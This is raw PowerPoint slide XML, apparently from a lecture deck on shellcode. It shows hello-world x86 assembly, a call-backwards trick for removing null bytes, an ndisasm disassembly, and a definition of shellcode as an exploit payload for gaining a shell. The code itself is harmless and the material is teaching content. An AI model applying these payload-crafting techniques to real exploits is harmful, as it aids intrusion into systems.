                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 0        ; Status = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: exit(0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>one:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  call two   ; Call back upwards to avoid null bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901700" y="5715000"/>
            <a:ext cx="8035277" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Trick! Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>backwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>instead of forward. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Thanks to two‘s complement, leading bits will be turned on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20397075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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Call instruction</a:t>
            </a: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smtClean="0"/>
              <a:t>Removing NULL bytes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="1628839"/>
            <a:ext cx="7211516" cy="3475310"/>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000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> helloworld2.s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@bt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ndisasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -b32 helloworld2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000  EB1E              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> short 0x20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000002  59                pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000003  B804000000         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> eax,0x4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000008  BB01000000         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ebx,0x1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000000D  BA0F000000         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> edx,0xf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000012  CD80              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000014  B801000000         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> eax,0x1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000019  BB00000000         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ebx,0x0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000001E  CD80              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000020  E8DDFFFFFF        call 0x2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000025  48                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000026  656C              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>insb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000028  6C                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>insb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000029  6F                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>outsd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000002A  2C20              sub al,0x20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000002C  776F              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x9d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000002E  726C              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x9c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000030  64210A            and [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fs:edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>],</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000033  0D                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x0D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@bt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:~#</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38483449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smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Originally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>small piece of byte code used as payload in an exploit to gain command shell on a remote/local machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Evolved: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>any piece of byte code used as payload in an exploit.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Objective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Gain process control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2932521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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="119063" indent="-119063"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Deeper understanding of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40964" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1397000"/>
            <a:ext cx="8382000" cy="863600"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Knowledge of byte code based on assembly instructions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="40965" name="Group 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4179492257"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="852264" y="2433638"/>
          <a:ext cx="7608168" cy="1341120"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1919536"/>
                <a:gridCol w="5688632"/>
              </a:tblGrid>
              <a:tr h="376238">
                <a:tc gridSpan="2">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20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Jumping</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tc hMerge="1">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endParaRPr kumimoji="0" lang="en-US" sz="20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endParaRP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12900" algn="l"/>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>Shell code</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Instruction</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12900" algn="l"/>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
